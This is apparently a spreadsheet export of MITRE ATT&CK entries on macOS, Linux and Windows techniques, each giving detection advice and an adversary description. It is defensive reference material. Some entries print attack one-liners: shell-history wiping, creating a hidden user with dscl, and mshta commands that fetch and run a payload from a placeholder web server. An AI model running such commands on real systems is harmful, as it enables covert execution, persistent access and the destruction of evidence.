  <si>
    <t>Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.</t>
  </si>
  <si>
    <t>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 (Citation: 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 (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>Plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the &lt;code&gt;apple.awt.UIElement&lt;/code&gt; or any other suspicious plist tag in plist files and flag them.</t>
  </si>
  <si>
    <t>The configurations for how applications run on macOS and OS X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However, adversaries can abuse this feature and hide their running window  (Citation: Antiquated Mac Malware).</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further.</t>
  </si>
  <si>
    <t>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other utilities or events like drive-by downloads don’t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: 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 (Citation: Clearing quarantine attribute) (Citation: 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 (Citation: Bypassing Gatekeeper)</t>
  </si>
  <si>
    <t>Private Keys</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</si>
  <si>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t>
  </si>
  <si>
    <t>Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)
Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on * nix-based systems or &lt;code&gt;C:\Users\(username)\.ssh\&lt;/code&gt; on Windows.
Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.
Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file are indicators of suspicious activity.</t>
  </si>
  <si>
    <t>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs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&lt;code&gt;unset HISTFILE&lt;/code&gt;, &lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;, &lt;code&gt;history -c&lt;/code&gt;, &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Hidden Users</t>
  </si>
  <si>
    <t>This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs.</t>
  </si>
  <si>
    <t>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By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: &lt;code&gt;sudo dscl . -create /Users/username UniqueID 401&lt;/code&gt; (Citation: Cybereason OSX Pirrit).</t>
  </si>
  <si>
    <t>HISTCONTROL</t>
  </si>
  <si>
    <t>Process monitoring,Authentication logs,File monitoring,Environment variable</t>
  </si>
  <si>
    <t>Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is also suspicious.</t>
  </si>
  <si>
    <t>The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. This setting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&lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</t>
  </si>
  <si>
    <t>Binary file metadata,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior.</t>
  </si>
  <si>
    <t>As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD  (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different  (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.</t>
  </si>
  <si>
    <t>Plist Modification</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</si>
  <si>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Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.</t>
  </si>
  <si>
    <t>Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UT-8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these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)</t>
  </si>
  <si>
    <t>defense-evasion,persistence,privilege-escalation</t>
  </si>
  <si>
    <t>Space after Filename</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Launchctl</t>
  </si>
  <si>
    <t>Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.</t>
  </si>
  <si>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(Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. 
Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.</t>
  </si>
  <si>
    <t>defense-evasion,execution,persistence</t>
  </si>
  <si>
    <t>Source</t>
  </si>
  <si>
    <t>Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.</t>
  </si>
  <si>
    <t>The &lt;code&gt;source&lt;/code&gt; command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways &lt;code&gt;source /path/to/filename [arguments]&lt;/code&gt; or &lt;code&gt;. /path/to/filename [arguments]&lt;/code&gt;. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment. 
Adversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.</t>
  </si>
  <si>
    <t>Trap</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</t>
  </si>
  <si>
    <t>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either to gain execution or as a persistence mechanism. Trap commands are of the following format &lt;code&gt;trap 'command list' signals&lt;/code&gt; where "command list" will be executed when "signals" are received.</t>
  </si>
  <si>
    <t>execution,persistence</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>API monitoring,System calls,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor for execution of AppleScript through osascript that may be related to other suspicious behavior occurring on the system.</t>
  </si>
  <si>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&lt;code&gt;osalang&lt;/code&gt; program.
AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. 
Adversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python  (Citation: Macro Malware Targets Macs). Scripts can be run from the command lie via &lt;code&gt;osascript /path/to/script&lt;/code&gt; or &lt;code&gt;osascript -e "script here"&lt;/code&gt;.</t>
  </si>
  <si>
    <t>.bash_profile and .bashrc</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Process use of network</t>
  </si>
  <si>
    <t>While users may customize their &lt;code&gt;~/.bashrc&lt;/code&gt; and &lt;code&gt;~/.bash_profile&lt;/code&gt; files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.</t>
  </si>
  <si>
    <t>&lt;code&gt;~/.bash_profile&lt;/code&gt; and &lt;code&gt;~/.bashrc&lt;/code&gt; are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed for login shells and &lt;code&gt;~/.bashrc&lt;/code&gt; is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), &lt;code&gt;~/.bash_profile&lt;/code&gt; is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, &lt;code&gt;~/.bashrc&lt;/code&gt; is executed. This allows users more fine grained control over when they want certain commands executed.
Mac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling &lt;code&gt;~/.bash_profile&lt;/code&gt; each time instead of &lt;code&gt;~/.bashrc&lt;/code&gt;.
These files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell  (Citation: amnesia malware).</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t>Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. 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t>
  </si>
  <si>
    <t>macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.
A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)
If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</t>
  </si>
  <si>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Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.
### Windows
Users can mark specific files as hidden by using the attrib.exe binary. Simply do &lt;code&gt;attrib +h filename&lt;/code&gt; to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.
### Linux/Mac
Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folder that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: &lt;code&gt;defaults write com.apple.finder AppleShowAllFiles YES&lt;/code&gt;, and then relaunch the Finder Application.
### Mac
Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker).
Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>Monitor Launch Agent creation through additional plist files and utilities such as Objective-See’s  KnockKnock application. Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.</t>
  </si>
  <si>
    <t>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 (Citation: AppleDocs Launch Agent Daemons) (Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware). These launch agents have property list files which point to the executables that will be launched (Citation: OSX.Dok Malware).
Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories  (Citation: Sofacy Komplex Trojan)  (Citation: Methods of Mac Malware Persistence). The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in (Citation: OSX Malware Detection) (Citation: OceanLotus for OS X). They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).</t>
  </si>
  <si>
    <t>Launch Daemon</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor Launch Daemon creation through additional plist files and utilities such as Objective-See's Knock Knock application.</t>
  </si>
  <si>
    <t>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 (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).
Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software  (Citation: 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t>
  </si>
  <si>
    <t>LC_LOAD_DYLIB Addition</t>
  </si>
  <si>
    <t>Binary file metadata,Process monitoring,Process command-line parameters,File monitoring</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</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</si>
  <si>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 (Citation: Writing Bad Malware for OSX).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 (Citation: Malware Persistence on OS X).</t>
  </si>
  <si>
    <t>Login Item</t>
  </si>
  <si>
    <t>File monitoring,API monitoring</t>
  </si>
  <si>
    <t>All the login items created via shared file lists are viewable by going to the Apple menu -&gt; System Preferences -&gt; Users &amp; Groups -&gt; Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in &lt;code&gt; Contents/Library/LoginItems &lt;/code&gt; within an application bundle, so these paths should be monitored as well  (Citation: Adding Login Items). Monitor process execution resulting from login actions for unusual or unknown applications.</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</si>
  <si>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 (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user's &lt;code&gt;~/Library/Preferences/&lt;/code&gt; directory in a plist file called &lt;code&gt;com.apple.loginitems.plist&lt;/code&gt; (Citation: Methods of Mac Malware Persistence).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 (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method &lt;code&gt; SMLoginItemSetEnabled &lt;/code&gt; can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well  (Citation: Adding Login Items).</t>
  </si>
  <si>
    <t>Rc.common</t>
  </si>
  <si>
    <t>The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.</t>
  </si>
  <si>
    <t>During the boot process, macOS executes &lt;code&gt;source /etc/rc.common&lt;/code&gt;, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.
Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.</t>
  </si>
  <si>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 .plist&lt;/code&gt;. 
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).</t>
  </si>
  <si>
    <t>Startup Items</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</si>
  <si>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t>
  </si>
  <si>
    <t>Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons),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 (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as root. If an adversary is able to modify an existing Startup Item, then they will be able to Privilege Escalate as well.</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set.</t>
  </si>
  <si>
    <t>When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively  (Citation: setuid man page).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An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future  (Citation: OSX Keydnap malware).</t>
  </si>
  <si>
    <t>privilege-escalation,persistence</t>
  </si>
  <si>
    <t>Securityd Memory</t>
  </si>
  <si>
    <t>In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: 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 (Citation: OS X Keychain)
If an adversary can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 (Citation: OS X Keychain) (Citation: OSX Keydnap malware)</t>
  </si>
  <si>
    <t>Local Job Scheduling</t>
  </si>
  <si>
    <t>Legitimate scheduled jobs may be created during installation of new software or through administration functions. Jobs scheduled with launchd and cron can be monitored from their respective utilities to list out detailed information about the jobs. Monitor process execution resulting from launchd and cron tasks to look for unusual or unknown applications and behavior.</t>
  </si>
  <si>
    <t>On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task](https://attack.mitre.org/techniques/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).
### cron
System-wide cron jobs are installed by modifying &lt;code&gt;/etc/crontab&lt;/code&gt; file, &lt;code&gt;/etc/cron.d/&lt;/code&gt; directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.
Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.
### at
The at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.
### launchd
Each launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called &lt;code&gt;StartCalendarInterval&lt;/code&gt; with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.</t>
  </si>
  <si>
    <t>persistence,execution</t>
  </si>
  <si>
    <t>Sudo</t>
  </si>
  <si>
    <t>On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).</t>
  </si>
  <si>
    <t>The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;,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 (Citation: OSX.Dok Malware). 
Adversaries can take advantage of these configurations to execute commands as other users or spawn processes with higher privileges. You must have elevated privileges to edit this file though.</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the binary being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious.</t>
  </si>
  <si>
    <t>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension &lt;code&gt;.hta&lt;/code&gt;. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)
Adversaries can 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Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: GitHub SubTee The List)</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning</t>
  </si>
  <si>
    <t>Windows Registry,Packet capture,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Monitor &lt;code&gt;HKLM\Software\Policies\Microsoft\Windows NT\DNSClient&lt;/code&gt; for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool. (Citation: GitHub Conveigh)</t>
  </si>
  <si>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 (Citation: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Several tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Packet capture</t>
  </si>
  <si>
    <t>If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)</t>
  </si>
  <si>
    <t>Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)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</si>
  <si>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Dynamic Data Exchange</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution. (Citation: NVisio Labs DDE Detection Oct 2017)
Monitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.
Monitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications.</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</si>
  <si>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 DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</t>
  </si>
  <si>
    <t>Password Filter DLL</t>
  </si>
  <si>
    <t>DLL monitoring,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>Monitor for change notifications to and from unfamiliar password filters.
Newly installed password filters will not take effect until after a system reboot.
Password filters will show up as an autorun and loaded DLL in lsass.exe. (Citation: Clymb3r Function Hook Passwords Sept 2013)</t>
  </si>
  <si>
    <t>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 (Citation: Carnal Ownage Password Filters Sept 2013)</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for COM objects loading DLLs and other modules not typically associated with the application. (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017)
Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
Monitor for influx of Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</t>
  </si>
  <si>
    <t>Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM)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
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL) (Citation: Microsoft Process Wide Com Keys) (Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods. (Citation: Enigma MMC20 COM Jan 2017) (Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.
DCOM may also expose functionalities that can be leveraged during other areas of the adversary chain of activity such as Privilege Escalation and Persistence. (Citation: ProjectZero File Write EoP Apr 2018)</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>Network protocol analysis,Packet capture,System calls,Process use of network,Process monitoring,Browser extensions</t>
  </si>
  <si>
    <t>Inventory and monitor browser extension installations that deviate from normal, expected, and benign extensions. Process and network monitoring can be used to detect browsers communicating with a C2 server. However, this may prove to be a difficult way of initially detecting a malicious extension depending on the nature and volume of the traffic it generates.
Monitor for any new items written to the Registry or PE files written to disk. That may correlate with browser extension installation.</t>
  </si>
  <si>
    <t>Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: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may not be difficult for malicious extensions to defeat automated scanners and be uploaded. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser, to include credentials, (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command &amp; control  (Citation: Chrome Extension C2 Malware).</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process monitoring</t>
  </si>
  <si>
    <t>With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014)
Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA.
Utilize the Sysinternals Process Monitor utility to monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)</t>
  </si>
  <si>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 (Citation: Microsoft Security Subsystem)
Adversaries may target lsass.exe drivers to obtain execution and/or persistence. By either replacing or adding illegitimate drivers (e.g., [DLL Side-Loading](https://attack.mitre.org/techniques/T1073) or [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038)), an adversary can achieve arbitrary code execution triggered by continuous LSA operations.</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>API monitoring,Authentication logs,Windows event logs</t>
  </si>
  <si>
    <t>Examine data in user’s SID-History attributes using the PowerShell Get-ADUser Cmdlet (Citation: Microsoft Get-ADUser), especially users who have SID-History values from the same domain. (Citation: AdSecurity SID History Sept 2015)
Monitor Account Management events on Domain Controllers for successful and failed changes to SID-History. (Citation: AdSecurity SID History Sept 2015)  (Citation: Microsoft DsAddSidHistory)
Monitor Windows API calls to the &lt;code&gt;DsAddSidHistory&lt;/code&gt; function. (Citation: Microsoft DsAddSidHistory)</t>
  </si>
  <si>
    <t>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Adversaries may use this mechanism for privilege escalation.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[Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028).</t>
  </si>
  <si>
    <t>Hooking</t>
  </si>
  <si>
    <t>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure. (Citation: Microsoft Hook Overview) (Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools  (Citation: Volatility Detecting Hooks Sept 2012) (Citation: PreKageo Winhook Jul 2011) (Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures. (Citation: Zairon Hooking Dec 2006) (Citation: EyeofRa Detecting Hooking June 2017)
Rootkits detectors  (Citation: GMER Rootkits) can also be used to monitor for various flavors of hooking activity.
Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes  (Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions. (Citation: StackExchange Hooks Jul 2012) (Citation: Adlice Software IAT Hooks Oct 2014)
